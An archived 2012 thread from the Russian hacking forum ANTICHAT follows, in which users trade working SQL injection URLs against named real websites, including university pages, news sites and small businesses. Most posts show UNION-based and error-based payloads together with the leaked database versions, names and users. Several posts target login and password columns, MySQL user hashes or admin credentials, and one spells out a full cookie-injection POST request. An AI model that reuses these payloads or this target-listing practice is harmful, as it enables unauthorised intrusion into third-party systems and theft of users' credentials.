HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14691  
Старый 04.02.2012, 18:23
kravch_v
Guest
Сообщений: n/a
Провел на форуме:
45485

Репутация: 1
По умолчанию

Горящие туры в Грецию, Бали, Кипр, Тайланд - Туристическая фирма Познай Мир.

тИЦ - 90

Код:
Code:
http://www.poznay-mir.ru/about.php?uid=-1 AND 1=0 UNION ALL SELECT 1,CONCAT(0x3c454d553e,CONCAT_WS(0x3c5345503e,database(),version(),user()),0x3c2f454d553e),3,4,5
poznaymir;5.0.87;root@zvm32.host.ru

Код:
Code:
http://www.borodin-moka.ru/answers/index.php?id=-1 AND 1=0 UNION ALL SELECT 1,2,3,CONCAT(0x3c454d553e,CONCAT_WS(0x3c5345503e,user(),database(),version()),0x3c2f454d553e)
borodin-mokaru@localhost;borodinmokaru;5.0.51a-24+lenny5-log
 
Ответить с цитированием

  #14692  
Старый 04.02.2012, 19:35
HellFire
Познающий
Регистрация: 18.01.2009
Сообщений: 62
Провел на форуме:
2832076

Репутация: 42
По умолчанию

Мировое искусство: живопись, литература, анимация, кино.

Код:
Code:
http://www.world-art.ru/cinema/cinema_episode.php?id=18187&episode=1-0.1+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),6,7,8,9,10,11,12,13--
Database Version: 5.5.2-m2-log

Database name: wwwworldartru

User name: worldart@localhost

ТИЦ: 1700

PR: 3


Федеральный альянс по безопасности дома.

Код:
Code:
http://flash.org/peril_inside.php?id=1-0.1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),3,4,5--
Database Version: 5.0.77-log

Database name: flash

User name: flash@localhost

ТИЦ: 10

PR: 7


Саундтреки к фильмам.

Код:
Code:
http://www.soundtrack.net/trailers/composer-trailer.php?id=1-0.1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),2,3,4--
Database Version: 5.0.77

Database name: STN

User name: stn@localhost

ТИЦ: 70

PR: 6
 
Ответить с цитированием

  #14693  
Старый 05.02.2012, 08:21
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

Код:
Code:
http://hci.stanford.edu/courses/cs547/speaker.php?date=-2012-01-27'+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,0,11,12,13,14,15,16--+
Database Version: 5.0.77

Database name: hci

User name: hci@localhost

---------------------------------------------------------------------------------------------------------

Код:
Code:
http://icme.stanford.edu/seminars/seminarInfo.php?seminar_id=17+union+select+1,2,3,4,5,6,7,8,9,0,11,group_concat(table_name),13,14,15,16+from+information_schema.tables--
Database Version: 5.1.49-3~bpo50+1-log

Database name: d_ICME_website

User name: dICMEwebsite@www01.Stanford.EDU
 
Ответить с цитированием

  #14694  
Старый 07.02.2012, 14:59
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию

free-jpeg.ru

SQL инъекция в INSERT запросе, параметр в куках, метод - Error based, дак еще и каптчу каждый раз придется вводить.

POST http://free-jpeg.ru/reg/

Head:

Код:
Code:
Host: free-jpeg.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://free-jpeg.ru/registration/
Cookie: ref=681%27%2C%27123123123%27%29+ON+DUPLICATE+KEY+UPDATE+a%3D%28select+1+from%28select+count%28%2A%29%2Cconcat%28%28select+concat_ws(0x3a,database(),version(),user())+from+information_schema.tables+limit+0,1%29%2Cfloor%28rand%280%29%2A2%29%29x+from+information_schema.tables+group+by+x%29a%29--+11; PHPSESSID=_SESS_HERE_
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Body

Код:
Code:
name=Soochechqa&email=123123s%40sd.ru&wm=R9999999999&pass=R9999&pass2=R9999&code=CAPTCHA_HERE&imageField.x=59&imageField.y=19
_SESS_HERE_ - PHPSESSID

CAPTCHA_HERE - код что изображен на http://free-jpeg.ru/captcha/pic.php

Результат:

Код:
Code:
Duplicate entry 'qwcat_urgepjeerf1102g:5.1.49-rel11.3-log:043353008_nit50h@local' for key 'group_key'
 
Ответить с цитированием

  #14695  
Старый 08.02.2012, 01:42
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию

ТИЦ 160 Траф 2К

Код:
Code:
http://www.vizd.ru/informdesk.php?cat=27&ann_id=-1%27+union+select+1,2,3,4,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,6,7,8,9,10,11,12,13--+
vizd_user@89.108.110.196:vizd_db:5.0.77
 
Ответить с цитированием

  #14696  
Старый 08.02.2012, 05:49
HellFire
Познающий
Регистрация: 18.01.2009
Сообщений: 62
Провел на форуме:
2832076

Репутация: 42
По умолчанию

Комитет участников рынка ценных бумаг.

Код:
Code:
http://www.comitet.ru/forum/see.php?id=666-666+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),3,4,5,6--
Database Version: 5.0.45-log

Database name: h2safed_comitet

User name: h2safed_comitet@www1.100mb.ru

ТИЦ: 50

PR: 4


Финский туризм.

Код:
Code:
http://www.to-finland.ru/index.php?id=1-0.1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User())--
Database Version: 5.1.49-3-log

Database name: z70438_finb

User name: z70438_finb@77.221.130.2

ТИЦ: 60

PR: 3


Студенческая гильдия.

Код:
Code:
http://www.guildonline.net/sgdsp/dispsite.php?groupsiteseq=1&pageseq=1-0.1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3,4--
Вывод в титле.

Database Version: 4.1.20

Database name: c17db1

User name: c17my1@localhost

ТИЦ: 0

PR: 5
 
Ответить с цитированием

  #14697  
Старый 08.02.2012, 09:39
MaXSS
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

тИц: 40

PR: 4

Код:
Code:
http://golosislama.ru/?cat=-1'+union+select+1,login,3,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19,20,21+%0Afrom+users+limit+1,1000+--+
 
Ответить с цитированием

  #14698  
Старый 08.02.2012, 19:21
mojaev
Новичок
Регистрация: 03.01.2009
Сообщений: 14
Провел на форуме:
242944

Репутация: 0
По умолчанию

Код:
Code:
http://web.mit.edu/press/component/mitexperts/?catid=1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13--+
 
Ответить с цитированием

  #14699  
Старый 08.02.2012, 20:18
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

interself.ru ТИЦ-110

Код:
Code:
www.interself.ru/info/newsshow.php?num=-273+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8+--+
Код:
Code:
5.1.45-log:ud_03_01adm@localhost:ud_03_44668_interself
lovemarks.com PR-5

Код:
Code:
www.lovemarks.com/index.php?pageID=20026&_fr_collectionid=36&_fr_collection1id=-147+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14+--+
Код:
Code:
5.0.77:ssl_mysql@localhost:svl_lovemarks_stage
cminds.org PR-5

Код:
Code:
www.cminds.org/index.php?option=com_discussions&view=thread&catid=2:demo-forum&thread=1'+union+all+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),user(),database()),11,12,13,14,15,16,17,18,19,20,21,22,23--+a
Код:
Code:
5.0.91mm-log:cminds27_jo151@localhost:cminds27_jo151
azbuk.net ТИЦ-110

Код:
Code:
http://www.azbuk.net/newbook/print.php?num=-13556+union+select+1,concat_ws(0x3a,version(),user(),database()),3+--+
Код:
Code:
5.1.29-rc:sat_book@195.248.234.87:sat_book
 
Ответить с цитированием

  #14700  
Старый 08.02.2012, 21:45
mojaev
Новичок
Регистрация: 03.01.2009
Сообщений: 14
Провел на форуме:
242944

Репутация: 0
По умолчанию

Тиц:10 PR:6

Код:
Code:
http://www.rssmix.com/engine.php?mix_id=-1+union+select+concat(user,0x3a,password)+from+mysql.user+limit+0,1+--+
Тиц:0 PR:5

Код:
Code:
http://www.phparchitecture.com/howto_show.php?id=-1+union+select+1,2,concat(usrName,0x3a,usrPassword),4,5+from+paAdmin+--+
Тиц:1100 PR:8 .edu

Код:
Code:
http://www.usc.edu/schools/price/faculty/detail.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
Тиц:700 PR:4

Код:
Code:
http://iran.ru/rus/print_news.php?news_id=-1+union+select+1,version(),3,4,5,6,7,8+--+
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ